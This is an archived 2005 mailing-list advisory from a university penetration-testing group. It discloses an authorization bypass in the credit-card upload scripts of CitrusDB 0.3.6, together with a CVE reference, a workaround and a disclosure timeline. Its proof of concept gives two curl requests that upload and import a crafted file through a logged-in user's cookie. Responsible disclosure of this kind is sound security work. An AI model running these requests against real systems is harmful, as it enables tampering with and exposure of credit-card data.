lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <a2cd9a9d1d8321065ff6feee0233e9af@informatik.rwth-aachen.de>
From: dornseif at informatik.rwth-aachen.de (Maximillian Dornseif)
Subject: Advisory: Upload Authorization bypass in CitrusDB

               Advisory: Upload Authorization bypass in CitrusDB

A group of students at our lab called RedTeam found an authorization  
bypass vulnerability in CitrusDB which results
in upload of fake credit card data, SQL-Injection and disclosure of  
credit card data.

Details
=======

Product: CitrusDB
Affected Version: 0.3.6 (verified), probably <=0.3.6
Immune Version: none (2005-01-30)
OS affected: all
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: http://www.citrusdb.org
Vendor-Status: informed
Advisory-URL:
http://tsyklon.informatik.rwth-aachen.de/redteam/advisories/rt-sa-2005 
-003
Advisory-Status: public
CVE: CAN-2005-0409
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0409#)

Introduction
============

Description from vendor:
"CitrusDB is an open source customer database application that uses PHP  
and a
database backend (currently MySQL) to keep track of customer  
information,
services, products, billing, and customer service information."

In the credit card data upload/import scripts it is only checked  
whether or
not a user is logged in but no privilege check is done.

More Details
============

In ./citrusdb/tools/importcc.php and ./citrusdb/tools/uploadcc.php no
authorization is done. Any logged in user (or in combination with
CAN-2005-0408 anybody) may upload a cvs file containing credit card  
data. He
also gets knowledge of the path to the temporary file that stores the
uploaded credit card data and may fetch additional uploaded credit card  
data
(compare CAN-2005-0229) if the file is accessible via http.  
Additionally he
may perform an SQL-Injection (compare CAN-2005-0410).

Proof of Concept
================

This uploads the file exploit.cvs.

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form
userfile=@...loit.cvs --form Import=Import

Note: The cookie has to be adjusted to an existing user.

This imports the file to the credit card database:

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor"
"http://<target>/citrusdb/tools/index.php?load=importcc&submit=on"

Note: The cookie has to be adjusted to an existing user.
No data will be imported if the cvs file is empty, the administrator  
probably
wouldn't notice that the temporary file is now empty but the attacker  
gets
the path to the temporary file and may access data that is uploaded in  
the
future if the path is inside document root (see CAN-2005-0229).
An SQL-Injection is also possible (see CAN-2005-0410)

Workaround
==========

Disable the upload of cvs data, e.g. by setting the path for the  
temporary
cvs file ($path_to_ccfile) to a non-writeable directory.

Fix
===

n/a

Security Risk
=============

The security risk is high because an attacker may corrupt important  
(credit
card) data and an attack is very easy to perform.

History
=======

2005-02-04 Email sent to author
2005-02-12 CVE number requested
2005-02-14 posted as CAN-2005-0409
RedTeam
=======

RedTeam is a penetration testing group working at the Laboratory for
Dependable Distributed Systems at RWTH-Aachen University. You can find  
more
Information on the RedTeam Project at
http://tsyklon.informatik.rwth-aachen.de/redteam/


-- 
Laboratory for Dependable Distributed Systems, RWTH Aachen University
Get news of the lab at   
http://mail-i4.informatik.rwth-aachen.de/mailman/listinfo/lufgtalk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2432 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050214/0d8470c0/smime.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ